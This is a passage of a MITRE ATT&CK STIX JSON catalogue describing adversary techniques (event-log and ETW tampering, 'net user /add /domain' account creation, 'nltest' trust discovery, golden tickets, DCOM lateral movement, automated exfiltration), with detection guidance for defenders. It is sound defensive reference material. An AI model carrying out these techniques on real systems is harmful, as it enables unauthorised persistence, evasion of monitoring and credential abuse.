M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-08T20:13:24.241Z", "name": "Location Identification", "description": "Adversaries may perform location identification using device data to inform operations and targeted impact for attacks. Location identification data can come in a number of forms, including geographic location, location relative to other control system devices, time zone, and current time. An adversary may use an embedded global positioning system (GPS) module in a device to figure out the physical coordinates of a device. NIST SP800-82 recommends that devices utilize GPS or another location determining mechanism to attach appropriate timestamps to log entries (Citation: Guidance - NIST SP800-82). While this assists in logging and event tracking, an adversary could use the underlying positioning mechanism to determine the general location of a device. An adversary can also infer the physical location of serially connected devices by using serial connection enumeration. \n\nAn adversary attempt to attack and cause Impact could potentially affect other control system devices in close proximity. Device local-time and time-zone settings can also provide adversaries a rough indicator of device location, when specific geographic identifiers cannot be determined from the system.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": true, "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Control Server"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7374ab87-0782-41f8-b415-678c0950bb2a", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-ics-attack", "url": "https://attack.mitre.org/techniques/T0825", "external_id": "T0825"}, {"source_name": "Guidance - NIST SP800-82", "description": "Keith Stouffer. (2015, May). Guide to Industrial Control Systems (ICS) Security. Retrieved March 28, 2018.", "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Command and Scripting Interpreter", "description": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nThere are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).\n\nAdversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.\n\nIf scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information discovery, collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network", "Office 365", "Azure AD", "IaaS", "Google Workspace"], "x_mitre_version": "2.4", "x_mitre_data_sources": [], "x_mitre_remote_support": true, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", "created": "2017-05-31T21:30:49.546Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1059", "external_id": "T1059"}, {"source_name": "Remote Shell Execution in Python", "description": "Abdou Rockikz. (2020, July). How to Execute Shell Commands in a Remote Machine in Python. Retrieved July 26, 2021.", "url": "https://www.thepythoncode.com/article/executing-bash-commands-remotely-in-python"}, {"source_name": "Cisco IOS Software Integrity Assurance - Command History", "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command History. Retrieved October 21, 2020.", "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#23"}, {"source_name": "Powershell Remote Commands", "description": "Microsoft. (2020, August 21). Running Remote Commands. Retrieved July 26, 2021.", "url": "https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-02-14T21:50:32.531Z", "name": "Indicator Blocking", "description": "An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering settings that control the collection and flow of event telemetry.(Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).\n\nFor example, adversaries may modify the `File` value in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Security to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.(Citation: disable_win_evt_logging) \n\nETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations.\n\nIn the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.\n\nIn Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Rob Smith", "Lucas Heiligenstein"], "x_mitre_deprecated": false, "x_mitre_detection": "Detect lack of reported activity from a host sensor. Different methods of blocking may cause different disruptions in reporting. Systems may suddenly stop reporting all data or only certain kinds of data.\n\nDepending on the types of host information collected, an analyst may be able to detect the event that triggered a process to stop or connection to be blocked. For example, Sysmon will log when its configuration state has changed (Event ID 16) and Windows Management Instrumentation (WMI) may be used to subscribe ETW providers that log any provider removal from a specific trace session. (Citation: Medium Event Tracing Tampering 2018) To detect changes in ETW you can also monitor the registry key which contains configurations for all ETW event providers: HKLM\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\AUTOLOGGER_NAME\\{PROVIDER_GUID}", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "macOS", "Linux"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Host intrusion prevention systems"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da", "created": "2020-03-19T19:09:30.329Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1562/006", "external_id": "T1562.006"}, {"source_name": "disable_win_evt_logging", "description": "Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.", "url": "https://ptylu.github.io/content/report/report.html?report=25"}, {"source_name": "LemonDuck", "description": "Manoj Ahuje. (2022, April 21). LemonDuck Targets Docker for Cryptomining Operations. Retrieved June 30, 2022.", "url": "https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/"}, {"source_name": "Microsoft Lamin Sept 2017", "description": "Microsoft. (2009, May 17). Backdoor:Win32/Lamin.A. Retrieved September 6, 2018.", "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A"}, {"source_name": "Microsoft About Event Tracing 2018", "description": "Microsoft. (2018, May 30). About Event Tracing. Retrieved June 7, 2019.", "url": "https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-events"}, {"source_name": "Medium Event Tracing Tampering 2018", "description": "Palantir. (2018, December 24). Tampering with Windows Event Tracing: Background, Offense, and Defense. Retrieved June 7, 2019.", "url": "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-02-01T04:37:36.774Z", "name": "Domain Account", "description": "Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account.(Citation: Savill 1999)\n\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for processes and command-line parameters associated with domain account creation, such as net user /add /domain. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain accounts to detect suspicious accounts that may have been created by an adversary.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "macOS", "Linux"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177", "created": "2020-01-28T14:05:17.825Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1136/002", "external_id": "T1136.002"}, {"source_name": "Microsoft User Creation Event", "description": "Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account was created. Retrieved June 30, 2017.", "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720"}, {"source_name": "Savill 1999", "description": "Savill, J. (1999, March 4). Net.exe reference. Retrieved September 22, 2015.", "url": "https://web.archive.org/web/20150511162820/http://windowsitpro.com/windows/netexe-reference"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Employee Names", "description": "Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.\n\nAdversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156", "created": "2020-10-02T14:57:15.906Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1589/003", "external_id": "T1589.003"}, {"source_name": "OPM Leak", "description": "Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS. Retrieved October 20, 2020.", "url": "https://www.opm.gov/cybersecurity/cybersecurity-incidents/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-11-08T14:00:00.188Z", "name": "Domain Trust Discovery", "description": "Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Dave Westgard", "Elia Florio, Microsoft", "Mnemonic", "RedHuntLabs, @redhuntlabs", "ExtraHop"], "x_mitre_deprecated": false, "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information, such as `nltest /domain_trusts`. Remote access tools with built-in features may interact directly with the Windows API to gather information. Look for the `DSEnumerateDomainTrusts()` Win32 API call to spot activity associated with [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Harmj0y Domain Trusts) Information may also be acquired through Windows system management tools such as [PowerShell](https://attack.mitre.org/techniques/T1059/001). The .NET method `GetAllTrustRelationships()` can be an indicator of [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Microsoft GetAllTrustRelationships)\n", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0", "created": "2019-02-14T16:15:05.974Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1482", "external_id": "T1482"}, {"source_name": "Microsoft Operation Wilysupply", "description": "Florio, E.. (2017, May 4). Windows Defender ATP thwarts Operation WilySupply software supply chain cyberattack. Retrieved February 14, 2019.", "url": "https://www.microsoft.com/security/blog/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/"}, {"source_name": "AdSecurity Forging Trust Tickets", "description": "Metcalf, S. (2015, July 15). It\u2019s All About Trust \u2013 Forging Kerberos Trust Tickets to Spoof Access across Active Directory Trusts. Retrieved February 14, 2019.", "url": "https://adsecurity.org/?p=1588"}, {"source_name": "Microsoft Trusts", "description": "Microsoft. (2009, October 7). Trust Technologies. Retrieved February 14, 2019.", "url": "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc759554(v=ws.10)"}, {"source_name": "Microsoft GetAllTrustRelationships", "description": "Microsoft. (n.d.). Domain.GetAllTrustRelationships Method. Retrieved February 14, 2019.", "url": "https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectory.domain.getalltrustrelationships?redirectedfrom=MSDN&view=netframework-4.7.2#System_DirectoryServices_ActiveDirectory_Domain_GetAllTrustRelationships"}, {"source_name": "Harmj0y Domain Trusts", "description": "Schroeder, W. (2017, October 30). A Guide to Attacking Domain Trusts. Retrieved February 14, 2019.", "url": "https://posts.specterops.io/a-guide-to-attacking-domain-trusts-971e52cb2944"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Golden Ticket", "description": "Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication material for any account in Active Directory.(Citation: CERT-EU Golden Ticket Protection) \n\nUsing a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.(Citation: ADSecurity Detecting Forged Tickets)\n\nThe KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.(Citation: ADSecurity Kerberos and KRBTGT) The KRBTGT password hash may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) and privileged access to a domain controller.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Itamar Mizrahi, Cymptom"], "x_mitre_detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within TGTs, and TGS requests without preceding TGT requests.(Citation: ADSecurity Kerberos and KRBTGT)(Citation: CERT-EU Golden Ticket Protection)(Citation: Stealthbits Detect PtT 2019)\n\nMonitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\n\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. \n", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--768dce68-8d0d-477a-b01d-0eea98b963a1", "created": "2020-02-11T19:13:33.643Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1558/001", "external_id": "T1558.001"}, {"source_name": "AdSecurity Kerberos GT Aug 2015", "description": "Metcalf, S. (2015, August 7). Kerberos Golden Tickets are Now More Golden. Retrieved December 1, 2017.", "url": "https://adsecurity.org/?p=1640"}, {"source_name": "CERT-EU Golden Ticket Protection", "description": "Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.", "url": "https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf"}, {"source_name": "ADSecurity Detecting Forged Tickets", "description": "Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015.", "url": "https://adsecurity.org/?p=1515"}, {"source_name": "ADSecurity Kerberos and KRBTGT", "description": "Sean Metcalf. (2014, November 10). Kerberos & KRBTGT: Active Directory\u2019s Domain Kerberos Service Account. Retrieved January 30, 2020.", "url": "https://adsecurity.org/?p=483"}, {"source_name": "Stealthbits Detect PtT 2019", "description": "Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket Attacks. Retrieved February 27, 2020.", "url": "https://blog.stealthbits.com/detect-pass-the-ticket-attacks"}, {"source_name": "Microsoft Kerberos Golden Ticket", "description": "Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated). Retrieved February 27, 2020.", "url": "https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-01-27T14:49:39.188Z", "name": "Component Object Model and Distributed COM", "description": "**This technique has been deprecated. Please use [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Component Object Model](https://attack.mitre.org/techniques/T1559/001).**\n\nAdversaries may use the Windows Component Object Model (COM) and Distributed Component Object Model (DCOM) for local code execution or to execute on remote systems as part of lateral movement. \n\nCOM is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) DCOM is transparent middleware that extends the functionality of Component Object Model (COM) (Citation: Microsoft COM) beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)\n\nPermissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry. (Citation: Microsoft COM ACL)(Citation: Microsoft Process Wide Com Keys)(Citation: Microsoft System Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.\n\nAdversaries may abuse COM for local command and/or payload execution. Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and VBScript.(Citation: Microsoft COM) Specific COM objects also exists to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors such as Privilege Escalation and Persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)\n\nAdversaries may use DCOM for lateral movement. Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications (Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents (Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1173) (DDE) execution directly through a COM created instance of a Microsoft Office application (Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}, {"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": true, "x_mitre_detection": "Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1086), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)\n\nMonitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.\n\nMonitor for any influxes or abnormal increases in Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "2.0", "x_mitre_permissions_required": ["Administrator", "SYSTEM", "User"], "x_mitre_remote_support": true, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--772bc7a8-a157-42cc-8728-d648e25c7fe7", "created": "2018-01-16T16:13:52.465Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1175", "external_id": "T1175"}, {"source_name": "Fireeye Hunting COM June 2019", "description": "Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019.", "url": "https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html"}, {"source_name": "Microsoft COM", "description": "Microsoft. (n.d.). Component Object Model (COM). Retrieved November 22, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx"}, {"source_name": "Microsoft COM ACL", "description": "Microsoft. (n.d.). DCOM Security Enhancements in Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1. Retrieved November 22, 2017.", "url": "https://docs.microsoft.com/en-us/windows/desktop/com/dcom-security-enhancements-in-windows-xp-service-pack-2-and-windows-server-2003-service-pack-1"}, {"source_name": "Microsoft Process Wide Com Keys", "description": "Microsoft. (n.d.). Setting Process-Wide Security Through the Registry. Retrieved November 21, 2017.", "url": "https://msdn.microsoft.com/en-us/library/windows/desktop/ms687317(v=vs.85).aspx"}, {"source_name": "Microsoft System Wide Com Keys", "description": "Microsoft. (n.d.). Registry Values for System-Wide Security. Retrieved November 21, 2017.", "url": "https://msdn.microsoft.com/en-us/library/windows/desktop/ms694331(v=vs.85).aspx"}, {"source_name": "ProjectZero File Write EoP Apr 2018", "description": "Forshaw, J. (2018, April 18). Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege. Retrieved May 3, 2018.", "url": "https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html"}, {"source_name": "Enigma Outlook DCOM Lateral Movement Nov 2017", "description": "Nelson, M. (2017, November 16). Lateral Movement using Outlook's CreateObject Method and DotNetToJScript. Retrieved November 21, 2017.", "url": "https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/"}, {"source_name": "Enigma MMC20 COM Jan 2017", "description": "Nelson, M. (2017, January 5). Lateral Movement using the MMC20 Application COM Object. Retrieved November 21, 2017.", "url": "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/"}, {"source_name": "Enigma DCOM Lateral Movement Jan 2017", "description": "Nelson, M. (2017, January 23). Lateral Movement via DCOM: Round 2. Retrieved November 21, 2017.", "url": "https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/"}, {"source_name": "Enigma Excel DCOM Sept 2017", "description": "Nelson, M. (2017, September 11). Lateral Movement using Excel.Application and DCOM. Retrieved November 21, 2017.", "url": "https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/"}, {"source_name": "Cyberreason DCOM DDE Lateral Movement Nov 2017", "description": "Tsukerman, P. (2017, November 8). Leveraging Excel DDE for lateral movement via DCOM. Retrieved November 21, 2017.", "url": "https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2024-01-24T00:04:01.066Z", "name": "Automated Exfiltration", "description": "Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020) \n\nWhen automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "exfiltration"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["ExtraHop"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "created": 